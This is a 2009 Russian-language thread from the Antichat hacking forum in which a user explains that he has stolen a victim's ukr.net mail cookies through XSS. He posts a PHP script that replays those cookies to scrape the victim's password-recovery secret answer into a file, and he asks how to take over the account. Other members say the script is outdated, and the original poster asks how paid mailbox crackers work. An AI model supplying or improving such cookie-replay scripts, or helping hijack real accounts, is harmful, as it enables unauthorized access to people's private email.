HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу ukrNet: поиметь пароль
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ukrNet: поиметь пароль
  #1  
Старый 22.04.2009, 17:29
firemen
Новичок
Регистрация: 03.06.2006
Сообщений: 22
С нами: 10493567

Репутация: 1
По умолчанию ukrNet: поиметь пароль
через XSS имею куки.
захожу на ящик жертвы нормально.

не нашел, за что бы зацепиться поменять пароль, не зная текущего...

в востановлении пароля используется секретный вопрос.

погуглив, нашел старенький скрипт, позволяющий имея куки выдрать ответ на секретный вопрос, правда работу его немного не понял )

вот он:

PHP код:
<?
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn"
$header.="Referer: http://e.ukr.netrn";
$header.="Cookie: ".$query."rn";
$header.="Host: e.ukr.netrnrn";
$fp=fsockopen("e.ukr.net"80); 
fwrite($fp$header); 
$dt=""
while (!feof($fp)) 
$dt.=fread($fp1024); 
// выдираем из полученной страницы ответ на секретный вопрос
$answ1=strpos($dt,'Password_Answer')+24
$answ2=strpos($dt,'" size="40">'); 
$length_answ=$answ2-$answ1
$full_answer=substr($dt,$answ1,$length_answ); 
// сохраняем полученный ответ на вопрос в файл: answer.html
$fp1=Fopen("answer.html","a"); 
fwrite($fp1,"$full_answer"); 
fclose($fp1); 
fclose($fp); 
?>
грамотные люди, подскажите есть ли рабочий скрипт такого плана или идеи по смене пароля..

удачи!
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 22.04.2009, 20:58
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
С нами: 10114465

Репутация: 303


По умолчанию
нет.
Возможно когда-то давно ответ на секретный вопрос можно было узнать просто попав в ящик, или сняв куки.
Данная строчка
Цитата:
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn";
обращение к данной странице, при помощи авторизации через куки.
 
Ответить с цитированием

  #3  
Старый 22.04.2009, 21:07
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Скрипт этот вообще древнейший. Какие-то стрпос... Все делается(лось) регулярками!
 
Ответить с цитированием

  #4  
Старый 23.04.2009, 10:00
firemen
Новичок
Регистрация: 03.06.2006
Сообщений: 22
С нами: 10493567

Репутация: 1
По умолчанию
lmns не знал, что секретный вопрос лежал открыто раньше )

так что, значит не судьба поиметь пароль?

а народ, что за бабки ящики ломает, брутят что ли только?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.